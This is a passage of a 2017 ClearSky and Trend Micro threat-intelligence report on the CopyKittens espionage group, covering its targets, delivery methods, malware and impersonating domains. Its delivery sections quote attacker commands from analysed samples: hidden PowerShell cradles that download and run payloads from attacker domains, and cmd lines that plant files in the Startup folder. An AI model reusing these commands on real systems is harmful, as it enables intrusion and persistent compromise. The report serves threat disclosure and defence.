# Operation Wilted Tulip ## Exposing a cyber espionage apparatus #### ClearSky Cyber Security Trend Micro ##### July 2017 ----- #### Contents Introduction .......................................................................................................................................................... 3 Targetting ..................................................................................................................................................... 3 Malware ....................................................................................................................................................... 3 Targeting ............................................................................................................................................................... 4 Delivery and Infection .......................................................................................................................................... 5 Watering Hole Attacks ..................................................................................................................................... 5 Web-Based Exploitation ................................................................................................................................... 6 Malicious Documents ....................................................................................................................................... 7 Exploiting CVE-2017-0199 ............................................................................................................................ 7 Embedded OLE Objects..............................................................................................................................11 Malicious Macros .......................................................................................................................................15 Fake Social Media Entities ..............................................................................................................................16 Web Hacking ..................................................................................................................................................19 Infrastructure Analysis ........................................................................................................................................20 Domains .........................................................................................................................................................20 IPs ...................................................................................................................................................................24 Malware ..............................................................................................................................................................27 TDTESS Backdoor............................................................................................................................................27 Installation and removal ............................................................................................................................27 Functionality ..............................................................................................................................................29 Indicators of Compromise .........................................................................................................................30 Vminst for Lateral Movement ........................................................................................................................31 NetSrv – Cobalt Strike Loader ........................................................................................................................32 Matryoshka v1 – RAT .....................................................................................................................................33 Matreyoshka v2 – RAT ...................................................................................................................................33 ZPP – File Compressor ....................................................................................................................................35 Cobalt Strike ...................................................................................................................................................36 Metasploit ......................................................................................................................................................37 Empire Post-exploitation Framework ............................................................................................................38 Indicators of Compromise ..................................................................................................................................39 Page 2 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- ### Introduction CopyKittens is a cyberespionage group that has been operating since at least 2013. In November 2015, ClearSky and Minerva Labs published[1] the first public report exposing its activity. In March 2017, ClearSky published a second report[2] exposing further incidents, some of which impacted the German Bundestag. In this report, Trend Micro and ClearSky expose a vast espionage apparatus spanning the entire time the group has been active. It includes recent incidents as well as older ones that have not been publicly reported; new malware; exploitation, delivery and command and control infrastructure; and the group's modus operandi. We dubbed this activity Operation Wilted Tulip ##### Targetting CopyKittens is an active cyber espionage actor whose primary focus appears to be foreign espionage on strategic targets. Its main targets are in countries such as Israel, Saudi Arabia, Turkey, The United States, Jordan, and Germany. Occasionally individuals in other countries are targeted as well as UN employees. Targeted organizations include government institutions (such as Ministry of Foreign Affairs), academic institutions, defense companies, municipal authorities, sub-contractors of the Ministry of Defense, and large IT companies. Online news outlets and general websites were breached and weaponized as a vehicle for watering hole attacks. For example, a malicious email was sent from a breached account of an employee in the Ministry of Foreign Affairs in the Turkish Republic of Northern Cyprus, trying to infect multiple targets in other government organizations worldwide. In a different case, a document likely stolen from the Turkish Ministry of Foreign affairs was used as decoy. In other cases, Israeli embassies were targeted, as well as foreign embassies in Israel. Victims are targeted by watering hole attacks, and emails with links to malicious websites or with malicious attachments. Fake Facebook profiles have been used for spreading malicious links and building trust with targets. Some of the profiles have been active for years. ##### Malware CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to date, and are analyzed in this report: TDTESS backdoor; Vminst, a lateral movement tool; NetSrv, a Cobalt Strike loader; and **ZPP, a files compression console program. The group also uses** **Matryoshka v1, a self-** developed RAT analyzed by ClearSky in the 2015 report, and Matryoshka v2 which is a new version, albeit with similar functionality. The group often uses the trial version of Cobalt Strike[3], a publicly available commercial software for "Adversary Simulations and Red Team Operations." Other public tools used by the group are Metasploit, a well-known free and open source framework for developing and executing exploit code against a remote target machine; Mimikatz, a post-exploitation tool that performs credential dumping; and Empire, "a PowerShell and Python post-exploitation agent." For detection and exploitation of internet-facing web servers, CopyKittens use Havij, Acunetix and sqlmap. A notable characteristic of CopyKittens is the use of DNS for command and control communication (C&C) and for data exfiltration. This feature is available both in Cobalt Strike and in Matryoshka. Most of the infrastructure used by the group is in the U.S., Russia, and The Netherlands. Some of it has been in use for more than two years. [1](http://www.clearskysec.com/report-the-copykittens-are-targeting-israelis/) [www.clearskysec.com/report-the-copykittens-are-targeting-israelis/](http://www.clearskysec.com/report-the-copykittens-are-targeting-israelis/) [2](http://www.clearskysec.com/copykitten-jpost/) [www.clearskysec.com/copykitten-jpost/](http://www.clearskysec.com/copykitten-jpost/) 3 [https://www.cobaltstrike.com](https://www.cobaltstrike.com/) Page 3 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- ### Targeting Based on Trend Micro Telemetry, incident response engagements, and open source threat intelligence investigations, we have learned of CopyKittens target organizations and countries. Its main targets are in countries such as Israel, Saudi Arabia, Turkey, The United States, Jordan, and Germany. Occasionally individuals in other countries are targeted as well as UN employees. Targeted organizations include government institutions (such as Ministry of Foreign Affairs), academic institutions, defense companies, municipal authorities, sub-contractors of the Ministry of Defense, and large IT companies. Online news outlets and general websites were breached and weaponized as a vehicle for watering hole attacks. For example, a malicious email was sent from a breached account of an employee in the Ministry of Foreign Affairs in the Turkish Republic of Northern Cyprus, trying to infect multiple targets in other government organizations worldwide. In a different case, a document likely stolen from the Turkish Ministry of Foreign affairs was used as decoy. In other cases, Israeli embassies were targeted, as well as foreign embassies in Israel. Based on the size of the attack infrastructure and length of the campaign, we estimate that there have been at least a few hundred people infected in multiple organizations in the targeted countries. After infecting a computer within a target organization, the attacker would move latterly using one of the malware descried in chapter "Malware." It seems that their objective is to gather as much information and data from target organizations as possible. They would indiscriminately exfiltrate large amounts of documents, spreadsheets, file containing personal data, configuration files and databases. In at least one case, the attackers breached an IT company, and used VPN access it had to client organizations to breach their networks. Often, victim organizations would learn of the breach due to the non-stealthy behavior of the attackers. The attackers would "get greedy," infecting multiple computers within the network of breached organizations. This would raise an alarm in various defense systems, making the victims initiate incident response operations. Page 4 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- ### Delivery and Infection CopyKittens attack their targets using the following methods: - **Watering hole attacks – inserting malicious JavaScript code into breached strategic websites.** - **Web based exploitation – emailing links to websites built by the attackers and containing known** exploits. - **Malicious documents – email attachments containing weaponized Microsoft Office documents.** - **Fake social media entities – fake personal and organizational Facebook pages are used for interaction** with targets and for information gathering. - **Web hacking – Havij, Acuntix and sqlmap are used to detect and exploit internet-facing web servers.** These methods are elaborated below. #### Watering Hole Attacks On 30 March 2017, ClearSky reported a breach of multiple websites, such as Jerusalem Post, Maariv news and the IDF Disabled Veterans Organization website.[4] JavaScript code was inserted into the breached websites, loading BeEF (Browser Exploitation Framework) from domains owned by the attackers .[5] For example: _Malicious code added to Maariv website_ The malicious code was loaded from one of the following addresses: _https://js.jguery[.]net/jquery.min.js_ _https://js.jguery[.]online/jgueryui.min.js_ This would enable the attackers to perform actions such as browser fingerprinting and information gathering, social engineering attacks (like asking for credentials, redirect to another page, asking the user to install a malicious extension or malware), network reconnaissance, infecting the computer using Metasploit exploits, and more.[6] The malicious code was served only when specific targets visited the website, likely based on IP whitelisting. Notably, prior to that publication, the German Federal Office for Information Security (BSI) said in a statement that it had investigated "problems in network traffic" of the German Bundestag.[7] The statement concluded that the website of Israeli newspaper Jerusalem Post was manipulated and linked to a harmful third party in January 2017. [4](http://www.clearskysec.com/copykitten-jpost/) [www.clearskysec.com/copykitten-jpost](http://www.clearskysec.com/copykitten-jpost/) [5](http://beefproject.com/) [http://beefproject.com](http://beefproject.com/) [6](https://github.com/beefproject/beef/wiki) [https://github.com/beefproject/beef/wiki](https://github.com/beefproject/beef/wiki) [7](https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2017/Cyber-Angriff_auf_den_Bundestag_Stellungnahme_29032017.html) [https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2017/Cyber-](https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2017/Cyber-Angriff_auf_den_Bundestag_Stellungnahme_29032017.html) [Angriff_auf_den_Bundestag_Stellungnahme_29032017.html](https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2017/Cyber-Angriff_auf_den_Bundestag_Stellungnahme_29032017.html) Page 5 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- #### Web-Based Exploitation In two incidents, the attackers breached the mailbox of a person related to a target organization. From this (real) account, they replied to previous correspondences with these organizations, adding a malicious link to a website registered and built by attackers: primeminister-goverment-techcenter].[tech. [8] JavaScript code, at least parts of which were copied from public sources, fingerprinted the visitor's web browser.[9] This was likely used for later browser exploitation with known vulnerabilities. In some pages the code enumerates and collects a list of installed browser plugins, in others it tries to detect the real IP of the computer: _Browser Plugins enumeration via JavaScipt code_ _Internal IP detection with Java_ The data is sent to the attackers, and the victim is redirected to https://akamitechnology[.]com/. _Collected data sent to server, then redirecting to new domain_ [8](https://blog.domaintools.com/2017/03/hunt-case-study-hunting-campaign-indicators-on-privacy-protected-attack-infrastructure/) [https://blog.domaintools.com/2017/03/hunt-case-study-hunting-campaign-indicators-on-privacy-protected-attack-](https://blog.domaintools.com/2017/03/hunt-case-study-hunting-campaign-indicators-on-privacy-protected-attack-infrastructure/) [infrastructure](https://blog.domaintools.com/2017/03/hunt-case-study-hunting-campaign-indicators-on-privacy-protected-attack-infrastructure/) [9](https://gist.github.com/kou1okada/2356972) [https://gist.github.com/kou1okada/2356972](https://gist.github.com/kou1okada/2356972) Page 6 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- _JavaScript and Java code loaded into webpage, victim is redirected after 20 seconds_ #### Malicious Documents The attackers use three document based exploitation types: exploiting CVE-2017-0199, embedding OLE objects, and macros. If the victim opens a document and the exploitation is successful (in the latter two, user interaction might be required), the attackers would receive access to the computer via self-developed or publicly available malware (see "Malware" chapter for more details). ##### Exploiting CVE-2017-0199 On 26 April 2017, a malicious email was sent from an employee account that was likely breached within the Ministry of Northern Cyprus. It was sent to a disclosed recipients list in government institutions in several countries and other organizations, mostly in or related to ministries of foreign affairs. We should note, however, that it is possible that the attackers were interested only in a few of the recipient organizations, but sent it to a wider list because they showed up in previous correspondences in the breached account. Recipients were in the following domains: mofa.gov.vn mfa.gov.sg mfa.gov.tr post.mfa.uz mfa.am mfa.gov.by beijing.mfa.gov.il mofat.go.kr mfa.no mofa.go.jp athens.mfa.gov.il riga.mfa.sk amfam.com emfa.pt mfa.gov.il mfa.gov.mk bu.edu us.mufg.jp cyburguide.com newdelhi.mfa.gov.il hemofarm.co.yu mfat.govt.nz mfa.gr mfa.gov.lv mfa.gov.ua mfa.go.th mfa.gov.bn mfa.ee sbcglobal.net mfa.is Page 7 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- The email is presented below: _Redacted version of the malicious email sent form the Ministry of Foreign Affairs in the Turkish Republic of Northern_ _Cyprus_ Attached to it was a document named "IRAN_NORTH-KOREA_Russia 20170420.docx".[11] _Content of the malicious document_ The document exploited CVE-2017-0199, downloading an rtf file from: _update.microsoft-office[.]solutions/license.doc_ The rtf file loads a VBA script from: _http://38.130.75[.]20/check.html_ 10 [https://www.virustotal.com/en/file/521687de405b2616b1bb690519e993a9fb714cecd488c168a146ff4bbf719f87/analysis/](https://www.virustotal.com/en/file/521687de405b2616b1bb690519e993a9fb714cecd488c168a146ff4bbf719f87/analysis/) 11 [https://www.virustotal.com/en/file/026e9e1cb1a9c2bc0631726cacdb208e704235666042543e766fbd4555bd6950/analysis](https://www.virustotal.com/en/file/026e9e1cb1a9c2bc0631726cacdb208e704235666042543e766fbd4555bd6950/analysis) Page 8 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- Which runs a Cobalt Strike stager that communicates with: _aaa.stage.14043411.email.sharepoint-microsoft[.]co_ In another case, the following document was uploaded to VirusTotal from Israel:[12] "The North Korean weapons program now testing USA range.docx" _Content of the malicious document and a prompt that opens when external links are updated_ It downloads an rtf document from: _http://update.microsoft-office[.]solutions/license.doc_ This downloads VBA code that runs a Cobalt Strike stager from the following addresses: _http://38.130.75[.]20/error.html_ Pivoting from update.microsoft-office[.]solutions, we found diagnose.microsoft-office[.]solutions, which pointed to 5.34.181.13. Using PassiveTotal we found 40.dc.c0ad.ip4.dyn.gsvr-static[.]co. Googling for gsvrstatic[.]co, we found another sample, gpupdate.bat," which runs PowerShell code that extracts a Cobalt Strike stager.[13]: _Base64 encoded PowerShell code that loads Cobalt Strike stager_ 12 [https://www.virustotal.com/en/file/43fbf0cc6ac9f238ecdd2d186de397bc689ff7fcc8c219a7e3f46a15755618dc/analysis](https://www.virustotal.com/en/file/43fbf0cc6ac9f238ecdd2d186de397bc689ff7fcc8c219a7e3f46a15755618dc/analysis) 13 [https://www.hybrid-analysis.com/sample/1f6e267a9815ef88476fb8bedcffe614bc342b89b4c80eae90e9aca78ff1eab8](https://www.hybrid-analysis.com/sample/1f6e267a9815ef88476fb8bedcffe614bc342b89b4c80eae90e9aca78ff1eab8?environmentId=100) Page 9 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- The sample communicates with gsvr-static[.]co via DNS. _DNS requests performed by the sample_ Yet in another case, malicious documents named “omnews.doc” and “pictures.doc” were served from the following locations: _http://fetchnews-agency.news-bbc[.]press/en/20170/pictures.doc_ _http://fetchnews-agency.news-bbc[.]press/omnews.doc_ The files load VBS from the following address: _http://fetchnews-agency.news-bbc[.]press/pictures.html_ Which runs a Cobalt Strike stager that communicates with: _a104-93-82-25.mandalasanati[.]info/iBpa_ From there, a Cobalt Strike beacon is loaded, communicating with: _s1w-amazonaws.office-msupdate[.]solutions_ Page 10 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- ##### Embedded OLE Objects In February 2017 a document titled "ssl.docx" was delivered to targets, likely via email.[14] It asked the recipient to "Please Update Your VPN Client from This Manual" [sic]. _Content of the malicious document asking the victim to update the VPN Client_ The "VPN Client manual" was an embedded OLE binary object, an executable with a reverse file extension: checkpointsslvpn?fdp.exe.[ 15] (The "?" stands for an invisible Unicode character that flips the direction of the string, making it look like a PDF file "exe.pdf.")[16] It was composed of two files: a self-extracting executable and a PDF. _Bundled executable and PDF files_ They run via the following command: _cmd.exe /c copy zWEC.tmp %userprofile%\desktop\Maariv_Tops.pdf&© Ma_1.tmp_ _"%userprofile%\AppData\Roaming\Microsoft\Windows\Start_ _Menu\Programs\Startup"\sourcefire.pif&&cd %userprofile%\desktop&&Maariv_Tops.pdf_ The PDF file is a decoy displayed to the victim during infection. It contains content copied on March 2017 from the public website of Maariv, a major Israeli news outlet. 14 [https://www.virustotal.com/en/file/b01e955a34da8698fae11bf17e3f79a054449f938257284155aeca9a2d38](https://www.virustotal.com/en/file/b01e955a34da8698fae11bf17e3f79a054449f938257284155aeca9a2d3815dd/analysis) [15dd/analysis](https://www.virustotal.com/en/file/b01e955a34da8698fae11bf17e3f79a054449f938257284155aeca9a2d3815dd/analysis) 15 [https://www.virustotal.com/en/file/72efda7309f8b24cd549f61f2b687951f30c9a45fda0fc3805c12409d0ba320a/analysis/](https://www.virustotal.com/en/file/72efda7309f8b24cd549f61f2b687951f30c9a45fda0fc3805c12409d0ba320a/analysis/) 16 Copykittens have used this this method before, for example in a document named "mfaformann?fdp.exe" Page 11 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- _Content of the malicious PDF file, copied from Maariv website_ The self-extracting executable contains another executable, named p.exe, which was digitally signed with a stolen certificate of a legitimate company called AI Squared. _Digital signature of p.exe_ Interestingly, this digital certificate was used by a threat group called Oilrig.[17] This might indicate the two groups share resources or otherwise collaborate in their activity. 17 [http://www.clearskysec.com/oilrig/](http://www.clearskysec.com/oilrig/) Page 12 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- The self-extracting executable serves as a downloader, running the following command: _cmd.exe /c powershell.exe -nop -w hidden -c "((new-object_ _net.webclient).downloadstring('http://jpsrv-java-jdkec2.javaupdate[.]co:80/JPOST'))"_ The C&C server sends back a short PowerShell code that loads a Cobalt Strike stager into memory. _Base64 encoded PowerShell code that loads Cobalt Strike stager into memory_ _Stager shellcode with marked user agent and C&C server address_ Both the docx and the executable contained the name shiranz in their metadata or file paths: _LastModifiedBy shiranz_ _C:\Users\shiranz\Desktop\checkpointsslvpn?fdp.exe_ _C:\Users\shiranz\AppData\Local\Temp\checkpointsslvpn?fdp.exe_ Page 13 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- In another sample, the decoy document was in Turkish, indicating the target s nationality. This document was likely stolen from the Turkish Ministry of Foreign Affairs: test_fdp.exe.[19] _Decoy document in Turkish_ While the decoy PDF document is opened, the following commands are executed: _cmd.exe /c copy Ma_1.tmp "%userprofile%\AppData\Roaming\Microsoft\Windows\Start_ _Menu\Programs\Startup"\CheckpointGO.pif&& copy sslvpn.tmp_ _%userprofile%\desktop\sslvpnmanual.pdf&& cd %userprofile%\desktop&& sslvpnmanual.pdf_ _cmd.exe /c powershell.exe -nop -w hidden -c "IEX ((new-object_ _net.webclient).downloadstring('http://jpsrv-java-jdkec2.javaupdate[.]co:80/Sourcefire'))"_ [18 https://www.hybrid-analysis.com/sample/a4adbea4fcbb242f7eac48ddbf13c814d5eec9220f7dce01b2cc8b56a806cd37](https://www.hybrid-analysis.com/sample/a4adbea4fcbb242f7eac48ddbf13c814d5eec9220f7dce01b2cc8b56a806cd37?environmentId=100) 19 [https://www.virustotal.com/en/file/a4adbea4fcbb242f7eac48ddbf13c814d5eec9220f7dce01b2cc8b56a806cd37/analysis](https://www.virustotal.com/en/file/a4adbea4fcbb242f7eac48ddbf13c814d5eec9220f7dce01b2cc8b56a806cd37/analysis/) Page 14 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- ##### Malicious Macros In October 2016, the attackers uploaded to VirusTotal multiple files containing macros, likely to learn if they are detected by antivirus engines. For example, "Date.dotm" contains this default Word template content:[20] _A default template of a Word document used as decoy_ The macro runs a Cobalt Strike stager that communicates with wk-in-f104.1c100.n.microsoft-security[.]host . The attackers also uploaded an executable files that would run a Word document with content in Hebrew.[21] _Hebrew decoy document_ The word document contains a macro that runs the following command: _cmd.exe /c powershell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object_ _System.Net.WebClient).DownloadFile('http://pht.is.nlb-deploy.edge-dyn.e11.f20.ads-youtube._ _online/winini.exe','%TEMP%\XU.exe');&start %TEMP%\XU.exe& exit_ In parallel, the executable drops d5tjo.exe, which is the legitimate Madshi debugging tool[ 2223] 20 [https://www.virustotal.com/en/file/7e3c9323be2898d92666df33eb6e73a46c28e8e34630a2bd1db96aeb39586aeb/analysis/](https://www.virustotal.com/en/file/7e3c9323be2898d92666df33eb6e73a46c28e8e34630a2bd1db96aeb39586aeb/analysis/) 21 [https://www.virustotal.com/en/file/9e5ab438deb327e26266c27891b3573c302113b8d239abc7f9aaa7eff9c4f7bb/analysis](https://www.virustotal.com/en/file/9e5ab438deb327e26266c27891b3573c302113b8d239abc7f9aaa7eff9c4f7bb/analysis) 22 [https://www.virustotal.com/en/file/7ad65e39b79ad56c02a90dfab8090392ec5ffed10a8e276b86ec9b1f2524ad31/analysis](https://www.virustotal.com/en/file/7ad65e39b79ad56c02a90dfab8090392ec5ffed10a8e276b86ec9b1f2524ad31/analysis) 23 [http://help.madshi.net/madExcept.htm](http://help.madshi.net/madExcept.htm) Page 15 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- #### Fake Social Media Entities Back in 2013, CopyKittens used several Facebook profiles to spread links to a website impersonating Haaretz news, an Israeli newspaper. In the screenshot below you can see the fake profile linking to haarettz.co[.]il (note the extra t in the domain). "Erick Brown"[24] _Fake profile "Erik Brown" posting link to malicious website_ "Amanda Morgan"[25] _Fake profile "Amanda Morgan" posting link to malicious website_ The latter profile tagged a fake Israeli profile as her cousin, "שרון דינה"[26] _Fake profile "שרון_ _דינה"_ 24 [https://www.facebook.com/israelhoughtonandplanetshakersphilippineconcert/posts/711649418845349](https://www.facebook.com/israelhoughtonandplanetshakersphilippineconcert/posts/711649418845349) 25 [https://www.facebook.com/ynetnews/posts/548075141952763](https://www.facebook.com/ynetnews/posts/548075141952763?__fns&hash=Ac072ehpwd43BNq1) 26 [https://www.facebook.com/profile.php?id=100003169608706](https://www.facebook.com/profile.php?id=100003169608706) Page 16 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- Who in turn tagged another fake Israeli profile as her cousin כהן גסיקה While "Erik Brown" has not been publicly active since September 2015, and the two other Israeli profiles have not been publicly active since September 2013, Amanda Morgan is still active to date. She has thousands of friends and 2,630 followers, many of which are Israeli. In 2015 she sent her friends an invitation to Like a Facebook page: "Emet press." _Amanda Morgan invites its friends to like "Emet press"_ Emet press (Emet means "truth" in Hebrew), is described as a non-biased news aggregator operated by Israeli students aboard. However, the Hebrew text is clearly not written by someone who speaks Hebrew as a first language: _Emet press Facebook page_ 27 [https://www.facebook.com/jessicacohe](https://www.facebook.com/jessicacohe) Page 17 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- The page re-posted news stories in Hebrew copied from online news outlets until August 2016. An accompanying website with similar content was published in www.emetpress[.]com. _Emet press website_ Neither the Facebook page nor website have been used to spread malicious or fake content publicly. We estimate that they were used to build trust with targets, and potentially send malicious content in private messages, however we do not have evidence of such activity. Looking at the website source code reveals that it was built with NovinWebGostar, a website building platform. _Emet press source code reveals that it was built with NovinWebGostar_ NovinWebGostar belongs to an Iranian web development company with the same name. _Website of Iranian web development company NovinWebGostar_ 28 [https://www.facebook.com/emetpress](https://www.facebook.com/emetpress/) Page 18 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- #### Web Hacking Based on logs from internet-facing web servers in target organizations, we have detected that CopyKittens use the following tools for web vulnerability scanning and SQL Injection exploitation. **Havij: "An automatic SQL Injection tool, [which is] distributed by ITSecTeam, an Iranian security company."[29]** Havij is freely distributed and has a graphical user interface. It is commonly used for automated SQL Injection and vulnerability assessments. **sqlmap: An "automatic SQL Injection and database takeover tool."[30] sqlmap is an open source penetration** testing tool that automates the process of detecting and exploiting SQL Injection flaws and taking over database servers. It is capable of database fingerprinting, data fetching from the database, and accessing the underlying file system and executing commands on the operating system via out-of-band connections. **Acunetix:** A commercial vulnerability scanner. "Acunetix tests for SQL Injection, XSS, XXE, SSRF, Host Header Injection and over 3000 other web vulnerabilities."[31] 29 [http://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/](http://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/) 30 [http://sqlmap.org](http://sqlmap.org/) 31 [https://www.acunetix.com](https://www.acunetix.com/) Page 19 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- ### Infrastructure Analysis #### Domains Below is a list of domains that have been used for malware delivery, command and control, and hosting malicious websites since the beginning of the group's activity.[32] **Domain** **Use** **registration date** **Impersonated company/product** israelnewsagency[.]link NA 26/06/2015 Israeli News Agancy ynet[.]link NA Ynet Israeli news outlet fbstatic-akamaihd[.]com Cobalt Strike DNS 04/09/2015 Akamai wheatherserviceapi[.]info Cobalt Strike DNS Generic windowkernel[.]com Cobalt Strike DNS Microsoft Windows fbstatic-a[.]space NA Facebook gmailtagmanager[.]com NA Gmail mswordupdate17[.]com NA 03/10/2015 Microsoft Windows cachevideo[.]com Cobalt Strike DNS 13/12/2015 Generic cachevideo[.]online Cobalt Strike DNS Generic cloudflare-statics[.]com Cobalt Strike DNS Cloudflare digicert[.]online Cobalt Strike DNS DigiCert certificate authority fb-statics[.]com Cobalt Strike DNS Facebook cloudflare-analyse[.]com Matreyoshka Cloudflare twiter-statics[.]info NA Twitter winupdate64[.]com NA Microsoft Windows 1m100[.]tech NA 10/04/2016 Google cloudmicrosoft[.]net NA 19/04/2016 Microsoft windowslayer[.]in Matreyoshka 06/06/2016 Microsoft Windows mywindows24[.]in NA Microsoft Windows wethearservice[.]com Matreyoshka 11/07/2016 Generic akamaitechnology[.]com Cobalt Strike SSL / TDTESS 02/08/2016 Akamai ads-youtube[.]online Cobalt Strike SSL Youtube akamaitechnology[.]tech Cobalt Strike SSL Akamai alkamaihd[.]com Cobalt Strike SSL Akamai alkamaihd[.]net Cobalt Strike SSL Akamai qoldenlines[.]net Cobalt Strike SSL Golden Lines (Israeli ISP) 1e100[.]tech NA Google ads-youtube[.]net NA Youtube azurewebsites[.]tech NA Microsoft Azure chromeupdates[.]online NA Google Chrome elasticbeanstalk[.]tech NA Amazon AWS Elastic Beanstalk microsoft-ds[.]com NA Microsoft trendmicro[.]tech NA Trend Micro fdgdsg[.]xyz NA 03/08/2016 Generic microsoft-security[.]host Cobalt Strike SSL 09/08/2016 Microsoft 32 Some have been reported in our previous public reports Page 20 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 |Domain|Use|registration date|Impersonated company/product| |---|---|---|---| |israelnewsagency[.]link|NA|26/06/2015|Israeli News Agancy| |ynet[.]link|NA||Ynet Israeli news outlet| |fbstatic-akamaihd[.]com|Cobalt Strike DNS|04/09/2015|Akamai| |wheatherserviceapi[.]info|Cobalt Strike DNS||Generic| |windowkernel[.]com|Cobalt Strike DNS||Microsoft Windows| |fbstatic-a[.]space|NA||Facebook| |gmailtagmanager[.]com|NA||Gmail| |mswordupdate17[.]com|NA|03/10/2015|Microsoft Windows| |cachevideo[.]com|Cobalt Strike DNS|13/12/2015|Generic| |cachevideo[.]online|Cobalt Strike DNS||Generic| |cloudflare-statics[.]com|Cobalt Strike DNS||Cloudflare| |digicert[.]online|Cobalt Strike DNS||DigiCert certificate authority| |fb-statics[.]com|Cobalt Strike DNS||Facebook| |cloudflare-analyse[.]com|Matreyoshka||Cloudflare| |twiter-statics[.]info|NA||Twitter| |winupdate64[.]com|NA||Microsoft Windows| |1m100[.]tech|NA|10/04/2016|Google| |cloudmicrosoft[.]net|NA|19/04/2016|Microsoft| |windowslayer[.]in|Matreyoshka|06/06/2016|Microsoft Windows| |mywindows24[.]in|NA||Microsoft Windows| |wethearservice[.]com|Matreyoshka|11/07/2016|Generic| |akamaitechnology[.]com|Cobalt Strike SSL / TDTESS|02/08/2016|Akamai| |ads-youtube[.]online|Cobalt Strike SSL||Youtube| |akamaitechnology[.]tech|Cobalt Strike SSL||Akamai| |alkamaihd[.]com|Cobalt Strike SSL||Akamai| |alkamaihd[.]net|Cobalt Strike SSL||Akamai| |qoldenlines[.]net|Cobalt Strike SSL||Golden Lines (Israeli ISP)| |1e100[.]tech|NA||Google| |ads-youtube[.]net|NA||Youtube| |azurewebsites[.]tech|NA||Microsoft Azure| |chromeupdates[.]online|NA||Google Chrome| |elasticbeanstalk[.]tech|NA||Amazon AWS Elastic Beanstalk| |microsoft-ds[.]com|NA||Microsoft| |trendmicro[.]tech|NA||Trend Micro| |fdgdsg[.]xyz|NA|03/08/2016|Generic| |microsoft-security[.]host|Cobalt Strike SSL|09/08/2016|Microsoft| ----- |Domain|Use|registration date|Impersonated company/product| |---|---|---|---| |cissco[.]net|Cobalt Strike DNS|29/08/2016|Cissco| |cloud-analyzer[.]com|Cobalt Strike DNS||Cellebrite (?)| |f-tqn[.]com|Cobalt Strike DNS||Generic| |mcafee-analyzer[.]com|Cobalt Strike DNS||Mcafee| |microsoft-tool[.]com|Cobalt Strike DNS||Microsoft| |mpmicrosoft[.]com|Cobalt Strike DNS||Microsoft| |officeapps-live[.]com|Cobalt Strike DNS||Microsoft| |officeapps-live[.]net|Cobalt Strike DNS||Microsoft| |officeapps-live[.]org|Cobalt Strike DNS||Microsoft| |primeminister-goverment-techcenter[.]tech|NA|05/09/2016|Israeli Prime Minister Office| |sdlc-esd-oracle[.]online|NA|09/10/2016|Oracle| |jguery[.]online|BEEF|13/10/2016|Jquery| |javaupdate[.]co|NA|16/10/2016|Oracle| |jguery[.]net|BEEF|19/10/2016|Jquery| |terendmicro[.]com|Cobalt Strike DNS|12/12/2016|Trend Micro| |windowskernel14[.]com|NA|20/12/2016|Microsoft Windows| |gstatic[.]online|NA|28/12/2016|Google| |ssl-gstatic[.]online|NA||Google| |broadcast-microsoft[.]tech|Cobalt Strike DNS|18/01/2017|Microsoft| |newsfeeds-microsoft[.]press|Cobalt Strike DNS||Microsoft| |sharepoint-microsoft[.]co|Cobalt Strike DNS||Microsoft| |dnsserv[.]host|NA||Generic| |nameserver[.]win|NA||Generic| |nsserver[.]host|NA||Generic| |owa-microsoft[.]online|NA||Microsoft Outlook| |owa-microsoft[.]online|Cobalt Strike DNS||Microsoft Outlook| |gsvr-static[.]co|NA|13/02/2017|Generic| |winfeedback[.]net|Cobalt Strike DNS|28/02/2017|Microsoft Windows| |win-update[.]com|Cobalt Strike DNS||Microsoft Windows| |intelchip[.]org|Cobalt Strike DNS|01/03/2017|Intel| |ipresolver[.]org|Cobalt Strike DNS||Generic| |javaupdator[.]com|Cobalt Strike DNS||Generic| |labs-cloudfront[.]com|Cobalt Strike DNS||Amazon CloudFront| |outlook360[.]net|Cobalt Strike DNS||Microsoft Outlook| |updatedrivers[.]org|Cobalt Strike DNS||Generic| |outlook360[.]org|Cobalt Strike DNS||Microsoft Outlook| |windefender[.]org|Cobalt Strike DNS||Microsoft| |microsoft-office[.]solutions|NA|23/04/2017|Microsoft| |gtld-servers.zone|Cobalt Strike SSL|01/07/2017|Root DNS servers| |gtld-servers.solutions|Cobalt Strike SSL||Root DNS servers| |gtld-servers.services|Cobalt Strike SSL||Root DNS servers| |akamai-net.network|NA||Akamai| |azureedge-net.services|NA||Microsoft Azure| |cloudfront.site|NA||Cloudfront| |googlusercontent.center|NA||Google| Page 21 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- |Domain|Use|registration date|Impersonated company/product| |---|---|---|---| |windows-updates.network|NA||Microsoft Windows| |windows-updates.services|NA||Microsoft Windows| |akamaized.online|NA|01/07/2017|Akamai| |cdninstagram.center|NA||Instegram| |netcdn-cachefly.network|NA||CacheFly| Noteworthy observations about the domains: - Domains impersonate one of four categories: - Major internet and software companies and services – Microsoft, Google, Akamai, Cloudflare, Amazon, Oracle, Facebook, Cisco, Twitter, Intel - 